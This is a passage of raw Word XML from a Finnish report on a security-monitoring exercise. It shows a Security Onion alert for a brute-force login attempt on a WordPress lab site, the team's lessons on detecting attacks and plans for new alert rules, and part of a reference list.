        <w:t>. Elastic_analyzer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="0096779A" w:rsidP="0096779A" w:rsidRDefault="007A3B74" w14:paraId="40DA0B8F" w14:textId="05BDD858">
      <w:r>
        <w:t>Security Onion tarjoaa myös laajan valikoiman työkaluja ja integraatioita, kuten cyberchef, MITRE ATT&amp;CK Navigator</w:t>
      </w:r>
      <w:r w:rsidR="00E02B7D">
        <w:t xml:space="preserve"> ja Kibana. </w:t>
      </w:r>
      <w:r w:rsidR="004356CF">
        <w:t>Security Onionilla pystytää</w:t>
      </w:r>
      <w:r w:rsidR="00F13AFF">
        <w:t xml:space="preserve">n myös tehdä melko syvällistä analyysiä, esimerkiksi PCAP-tiedostojen käsittelyllä ja analyysillä. </w:t>
      </w:r>
      <w:r w:rsidR="00E02B7D">
        <w:t xml:space="preserve">Järjestelmä on erittäin laaja ja tämän takia sen käyttö voi olla hieman haastavaa. </w:t>
      </w:r>
      <w:r w:rsidR="00B91060">
        <w:t xml:space="preserve">Tarkastellaan esimerkiksi hälytystä mahdollisesta brute-force hyökkäyksestä </w:t>
      </w:r>
      <w:r w:rsidR="00541C8D">
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidR="00B91060">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007944F8">
        <w:t>sivustollemme,</w:t>
      </w:r>
      <w:r w:rsidR="0050126F">
        <w:t xml:space="preserve"> jonka hälytyks</w:t>
      </w:r>
      <w:r w:rsidR="0071342F">
        <w:t>et näkyvät</w:t>
      </w:r>
      <w:r w:rsidR="0050126F">
        <w:t xml:space="preserve"> kuvioissa 39.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1D4B" w:rsidP="009B1D4B" w:rsidRDefault="009B1D4B" w14:paraId="441CC15B" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="009B1D4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DCDACB3" wp14:editId="61B19882">
            <wp:extent cx="6120130" cy="1974215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1577062000" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teksti,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62000" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teksti, ohjelmisto, Multimediaohjelmisto&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1974215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1D4B" w:rsidP="009B1D4B" w:rsidRDefault="009B1D4B" w14:paraId="3D63D3DE" w14:textId="1470A63A">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971556" w:id="87"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidR="0071342F">
        <w:t>Brute force hyökkäyksestä aiheutunut hälytys Security Onionissa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071342F" w:rsidP="0071342F" w:rsidRDefault="0071342F" w14:paraId="42DFC44D" w14:textId="77777777">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kuviossa 40 näkyy että kyseessä on GET pyyntö admin paneeliin, ja POST pyyntö eli kirjautumisyritys käyttäjätunnuksella admin ja salasanalla root66.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16BCF" w:rsidP="00A16BCF" w:rsidRDefault="00A16BCF" w14:paraId="796CA184" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00A16BCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4550BF31" wp14:editId="4588BC66">
            <wp:extent cx="6120130" cy="3542030"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="53362113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21138" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3542030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F74F3" w:rsidP="00A16BCF" w:rsidRDefault="00A16BCF" w14:paraId="4054E8E5" w14:textId="39394E72">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971557" w:id="88"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. network.data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="007944F8" w:rsidP="00A16BCF" w:rsidRDefault="0071342F" w14:paraId="177F9D7B" w14:textId="66BF5DC2">
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="001F1FBC">
        <w:t xml:space="preserve">uviossa 41 </w:t>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>ChatGPT:llä luotu suppea vertailutaulukko</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> käytetyistä</w:t>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t xml:space="preserve"> järjestelmistä. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390358" w:rsidP="00390358" w:rsidRDefault="00390358" w14:paraId="29A1DAE9" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00390358">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="215B11BE" wp14:editId="3CBDFE82">
            <wp:extent cx="4806950" cy="1851171"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="811097299"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97299" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, numero&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4813497" cy="1853692"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007944F8" w:rsidP="00390358" w:rsidRDefault="00390358" w14:paraId="0187F7C4" w14:textId="243D4B83">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971558" w:id="89"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidR="006D54F9">
        <w:t>Järjestelmien vertailu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00627569" w:rsidP="0028579A" w:rsidRDefault="0028579A" w14:paraId="23C8D382" w14:textId="6A8BA384">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc783109012" w:id="1790566130"/>
      <w:r w:rsidR="0028579A">
        <w:rPr/>
        <w:t>Harjoituksen opit ja miten tästä eteenpäin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1790566130"/>
    </w:p>
    <w:p w:rsidR="0028579A" w:rsidP="0028579A" w:rsidRDefault="00B55148" w14:paraId="2BD6FF0C" w14:textId="659A6E9B">
      <w:r>
        <w:t xml:space="preserve">Harjoituksen aikana opimme laajasti eri järjestelmien toiminnasta, vahvuuksista sekä ominaisuuksista. </w:t>
      </w:r>
      <w:r w:rsidR="00CF01F4">
        <w:t>Opimme testejä tehdessämme myös erilaisten hyökkäystekniikoiden käytännön toteutuksesta</w:t>
      </w:r>
      <w:r w:rsidR="00B73A3B">
        <w:t>, ja kuinka nämä esiintyvät seuranta</w:t>
      </w:r>
      <w:r w:rsidR="00E127E9">
        <w:t>- ja valvonta</w:t>
      </w:r>
      <w:r w:rsidR="00B73A3B">
        <w:t xml:space="preserve">järjestelmissä. </w:t>
      </w:r>
      <w:r w:rsidR="00E127E9">
        <w:t>Tämä antoi syvällisempää ymmärrystä hyökkäysten havaitsemisesta a torjunnasta sekä’ auttoi tunnistamaan nykyisten järjestelmien kehitystarpeita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00D72AB2" w14:paraId="743CA8BF" w14:textId="77777777">
      <w:r w:rsidRPr="00D72AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Järjestelmien vahvuudet ja kehityskohteet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00D72AB2" w14:paraId="56229B13" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72AB2">
        <w:t>Tunnistimme, mitkä osat järjestelmiä toimivat odotetusti ja tukivat tehokasta hyökkäysten havaitsemista ja estämistä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00D72AB2" w14:paraId="22431002" w14:textId="1FAEA6BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72AB2">
        <w:t>Toisaalta löysimme tiettyjä haavoittuvuuksia ja prosessien heikkouksia, jotka voivat tarjota hyökkääjille mahdollisuuksia. Nämä havainnot antavat selkeän pohjan priorisoida jatkokehityksen kohteita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00D72AB2" w14:paraId="6B6B41E1" w14:textId="77777777">
      <w:r w:rsidRPr="00D72AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hyökkäysten analysointi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00D72AB2" w14:paraId="0CCB4CED" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D72AB2">
        <w:rPr/>
        <w:t>Harjoituksen aikana kerrytimme ymmärrystä erilaisten hyökkäysvektorien käyttäytymisestä ja niiden havaitsemisen haasteista.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5FD3D9FB" w:rsidP="261F289F" w:rsidRDefault="5FD3D9FB" w14:paraId="2B55373A" w14:textId="044E2768">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="5FD3D9FB">
        <w:rPr/>
        <w:t>Työkalut toimivat suurimmassa osassa tapauksia hyvin ja havaitsivat hyökkäykset. Perustuen siihen, m</w:t>
      </w:r>
      <w:r w:rsidR="68A84E73">
        <w:rPr/>
        <w:t xml:space="preserve">itä hälytyksiä eri hyökkäyksistä odotettiin tulevan eri työkaluilla, ne </w:t>
      </w:r>
      <w:r w:rsidR="22F6E0E0">
        <w:rPr/>
        <w:t>toimivat melko hyvin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00D72AB2" w14:paraId="6E52E10F" w14:textId="43588278">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D72AB2">
        <w:rPr/>
        <w:t>Opimme myös hyökkäyksiin liittyvän loki- ja tapahtumatiedon tulkintaa, mikä auttaa parantamaan tilannekuvaa ja nopeuttamaan reagointia.</w:t>
      </w:r>
      <w:r w:rsidR="66EB84B9">
        <w:rPr/>
        <w:t xml:space="preserve"> Työkalujen hälytysten tulkinta oli tärkeä osa hyökkäysten havaitsemista, koska piti tietää selvästi, mitä tulee etsiä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D54F9" w:rsidP="006D54F9" w:rsidRDefault="006D54F9" w14:paraId="2ECCDBAA" w14:textId="77777777"/>
    <w:p w:rsidRPr="00D72AB2" w:rsidR="006D54F9" w:rsidP="006D54F9" w:rsidRDefault="006D54F9" w14:paraId="062E8432" w14:textId="77777777"/>
    <w:p w:rsidR="00E127E9" w:rsidP="0028579A" w:rsidRDefault="00D72AB2" w14:paraId="2E375E7F" w14:textId="4CE45F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Miten tästä eteenpäin?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00057702" w:rsidR="00D72AB2" w:rsidP="00D72AB2" w:rsidRDefault="00057702" w14:paraId="50A1A628" w14:textId="37F6429E">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00057702">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Järjestelmien kehittäminen: </w:t>
      </w:r>
      <w:r w:rsidRPr="00057702">
        <w:t>Priorisoidaan tunnistetut puutteet ja laaditaan kehityssuunnitelma niiden korjaamiseksi. Tämä voi sisältää esimerkiksi parempien valvontamekanismien tai hyökkäysten torjuntatyökalujen käyttöönottoa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008C0F52" w:rsidR="00057702" w:rsidP="00D72AB2" w:rsidRDefault="00057702" w14:paraId="13039015" w14:textId="48BEED09">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lokitiedon suodattaminen: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Luodaan erilaisia filttereitä seuranta- ja valvontajärjestelmiin, jotta voimme poissulkea </w:t>
      </w:r>
      <w:r w:rsidR="008C0F52">
        <w:t>”turhia hälytyksiä”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0031124C" w:rsidR="008C0F52" w:rsidP="00D72AB2" w:rsidRDefault="006A7AC1" w14:paraId="6ECC9570" w14:textId="0CC27ACB">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Järjestelmien säännöt: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Luomme uusia hälytyssääntöjä, </w:t>
      </w:r>
      <w:r w:rsidR="0031124C">
        <w:t xml:space="preserve">jotta pystymme havaitsemaan uhkia laajemmin, ja näin saamme puolustauduttua paremmin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006974C2" w:rsidP="006974C2" w:rsidRDefault="006974C2" w14:paraId="66962656" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00C7697B" w:rsidR="006974C2" w:rsidP="00C7697B" w:rsidRDefault="006974C2" w14:paraId="0230FD23" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D54F9" w:rsidP="261F289F" w:rsidRDefault="006D54F9" w14:paraId="1CBB2D46" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc52971250" w:id="91"/>
      <w:bookmarkStart w:name="_Toc52971609" w:id="92"/>
      <w:bookmarkStart w:name="_Toc58338875" w:id="93"/>
      <w:bookmarkStart w:name="_Toc63413622" w:id="94"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007B7B81" w:rsidR="00AC0315" w:rsidP="00A46B18" w:rsidRDefault="00AC0315" w14:paraId="12EE765A" w14:textId="4192184E">
      <w:pPr>
        <w:pStyle w:val="LhteetOtsikko"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc86267267" w:id="83913686"/>
      <w:r w:rsidRPr="261F289F" w:rsidR="00AC0315">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lähteet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="83913686"/>
    </w:p>
    <w:p w:rsidR="6560C003" w:rsidP="261F289F" w:rsidRDefault="6560C003" w14:paraId="6FEF8B22" w14:textId="4065B6EA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="6560C003">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Amit Sheps. Reverse Shell: How It Works, Examples and Prevention Tips. Aqua artikkeli. 2023. Viitattu 4.12.2024. </w:t>
      </w:r>
      <w:hyperlink r:id="Rd8f963c809db481b">
        <w:r w:rsidRPr="261F289F" w:rsidR="6560C003">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.aquasec.com/cloud-native-academy/cloud-attacks/reverse-shell-attack/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="04EA883F" w:rsidP="261F289F" w:rsidRDefault="04EA883F" w14:paraId="69B2FF53" w14:textId="57229F10">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Detecting data theft with </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the open-source XDR. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BleepingComputer</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>artikkeli</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. 2023. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Viitattu</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.12.2024. </w:t>
      </w:r>
      <w:hyperlink r:id="Re5f468a3323c4688">
        <w:r w:rsidRPr="261F289F" w:rsidR="04EA883F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.bleepingcomputer.com/news/security/detecting-data-theft-with-wazuh-the-open-source-xdr/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1B7731AB" w:rsidP="261F289F" w:rsidRDefault="1B7731AB" w14:paraId="2130AD19" w14:textId="21C7DC52">
      <w:pPr>
        <w:pStyle w:val="Lhdeluettelo"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Tunneling: Detecting DNS Tunneling Attacks. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zenarmor</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>artikkeli</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. 2023. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Viitattu</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.12.2024. </w:t>
      </w:r>
      <w:hyperlink w:anchor="how-can-organizations-detect-dns-tunneling-attacks" r:id="Ra0bf5446937d40a4">
